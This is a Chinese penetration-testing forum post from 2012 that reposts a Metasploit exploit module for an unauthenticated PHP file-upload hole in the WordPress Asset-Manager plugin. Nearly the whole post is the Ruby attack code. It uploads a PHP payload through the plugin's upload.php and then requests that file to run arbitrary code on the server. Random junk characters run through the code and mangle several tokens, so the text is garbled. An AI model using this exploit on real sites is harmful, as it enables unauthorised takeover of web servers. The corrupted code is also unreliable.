找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1989|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
& G( B+ m8 h! e6 n4 ]! X4 |. h3 m
& _: {" ~( m5 x4 R4 p' X6 J; r" d7 m##
4 f0 {! d$ W1 M" O+ Z5 i4 D# This file is part of the Metasploit Framework and may be subject to
# P2 b" o2 a. s# redistribution and commercial restrictions. Please see the Metasploit
9 Y+ T7 V& t! o# Framework web site for more information on licensing and terms of use.0 C; G7 O% j. k+ E0 k
#   http://metasploit.com/framework/
. `8 Q& U& ?1 @; Q8 K- I##
; Z$ I4 _" s6 q* k% P! L3 { 0 `2 \: J; O* T$ z
require 'msf/core'
; m1 u- x( }4 F" a- o# Z8 P0 }0 Y$ Frequire 'msf/core/exploit/php_exe'4 @$ z. }; Q6 o& J

1 Q8 }3 P: k, lclass Metasploit3 < Msf::Exploit::Remote5 w! Q# m: W) B4 p
  Rank = ExcellentRanking
% s8 N+ C, \9 P6 X. M 3 [& o4 t1 u' v/ G& f8 X/ q) j& y" u
  include Msf::Exploit::Remote::HttpClient
9 p! L- s# z* s: i7 e, W  include Msf::Exploit:hpEXE
4 T! I6 u" s/ {; L& N5 E" N
1 r. a( z& A0 \, ]7 j& h3 _  def initialize(info = {})
9 O  e9 `# o7 t  {0 _9 Q4 l* w# }    super(update_info(info," S: B  `8 [; T( b2 O8 @6 \9 ^) C. `
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
  u: U- N* h2 e* Q5 _3 @1 L      'Description'    => %q{
# k+ y/ _( Z( q5 J& y        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
- J3 \& D/ U" N5 @7 p8 s        plugin.  By abusing the upload.php file, a malicious user can upload a file to a2 x, S  N1 i, ^4 s# A
        temp directory without authentication, which results in arbitrary code execution.0 D& ]3 p, G7 |4 |& N8 X
      },( ]# A! l# H' v
      'Author'         =>
8 ^/ J. I( c, m& `9 o2 J" F        [
! l! Z, l6 }# r          'Sammy FORGIT', # initial discovery2 V! m, G9 [( O
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
5 x. q* x0 D; }, S% v        ],3 d! I2 o3 c6 H. \( R$ J
      'License'        => MSF_LICENSE,% p6 ~  X! N! f: {: l2 l4 ]
      'References'     =>
2 w0 L8 K! m0 }7 o        [
7 F6 P' l1 i+ X) C: K4 \! i          [ 'OSVDB', '82653' ],( j3 P+ }0 ~' ^8 t! Z4 q
          [ 'BID', '53809' ],* L) G" B& l8 [. Y, ^
          [ 'EDB', '18993' ],
+ q7 j$ b8 e/ t- P) e          [ 'URL', 'http:// www.myhack58.com /' ]
, H+ R7 t( J& z. B5 h        ],: q- o3 V: b4 A" D! c
      'Payload'       =>% ]# A& K3 D) O/ r. @* J# ?' k
        {
  z, c8 p. t, m; `# B3 W  ?          'BadChars' => "\x00",
3 X' j, w' E6 e) L; d        },
0 p( ~- P2 O2 K      'Platform'       => 'php',
) b/ C! b1 {. m2 u2 k3 s      'Arch'           => ARCH_PHP,/ l% W' ~2 ^" e1 w
      'Targets'        =>, r4 y1 q8 A; \) b8 \8 q% q" I
        [5 y( b1 z* V* J, X- t3 U$ g# L* `
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],4 s$ Z$ q$ Y& k
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
- @, B3 m  ^5 T, O( ~' L3 @/ U$ K        ],, s! Z; l& M8 G& O9 b* l
      'DefaultTarget' => 0," V& J7 ]9 W8 c
      'DisclosureDate' => 'May 26 2012'))
- t+ s+ h/ t) _8 H( }3 i5 [4 |
  m% v5 v' X* r7 r8 G+ s" R    register_options(
7 |) \" D; [4 o5 w4 W      [
& H; k! L9 D( G* e7 u        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
- W: y; m/ r9 n4 ]" E      ], self.class)
% O5 l, E7 t9 K2 N( [  end
6 r$ k0 I8 [0 T, g: p1 m 0 N0 d5 r+ x6 a; j
  def exploit
: \+ D/ {! Y  i2 ~: H    uri =  target_uri.path
& ]& _6 S, @  ~8 M$ {1 ?- A/ F    uri << '/' if uri[-1,1] != '/': g( `* b& u6 B6 O
    peer = "#{rhost}:#{rport}"( M- W5 q' E: {. d3 |
    payload_name = "#{rand_text_alpha(5)}.php"$ ?( l9 S  Y2 a" e
    php_payload = get_write_exec_payload(:unlink_self=>true)8 `6 l9 S! P+ ]  H5 T/ u4 a

  N% H0 ]: h9 J, ?; g+ j0 c7 d    data = Rex::MIME::Message.new
* @) \0 Q& \* V+ H9 s$ B. d" Q    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
, `' d; X* {5 ^% ]5 f! y    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
8 T2 X* d2 O2 p* _
5 _4 {) ], ~, p" Y% s    print_status("#{peer} - Uploading payload #{payload_name}")( j" a+ f4 K8 x3 }/ \8 E
    res = send_request_cgi({) g0 x5 _4 Y: s2 v
      'method'  => 'POST',9 M, L% g( W0 F1 M+ u
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
5 y* e( Z( v0 D" o+ j; m      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
5 |9 n# u* u% N  s" G      'data'    => post_data
" G+ A% x- p6 |- a) S    })
1 ~1 Z2 E# M, X3 A, R" L
( d: i% N4 C$ z    if not res or res.code != 200 or res.body !~ /#{payload_name}/
) B3 t7 k' @, r# p      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
# V: g% z9 e9 X* h7 K  tend
7 C$ q9 h: B- F: W9 h1 B: E3 F
6 G! }" G2 _/ O5 }8 s: u    print_status("#{peer} - Executing payload #{payload_name}")
9 f$ x6 N5 |8 v8 }3 s1 X    res = send_request_raw({
+ B8 I7 a! g% L7 n2 G. I      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",) H# [0 Q* M% A& f& k! C7 H
      'method'  => 'GET'6 {8 U+ E% o7 d) K3 K
    })  y' E$ @( s2 V7 n
7 a! G# C, p. f  P( `
    if res and res.code != 2002 m3 J3 B3 S. \* k" o
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
* j$ r& Z  r  C  o) x/ M- V, L    end
, z$ J4 A  b% p" t8 r* o" G  end
, Z# W, I. P0 B2 |# j" ~' v7 pend; J+ R9 x5 t. d% R& \
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表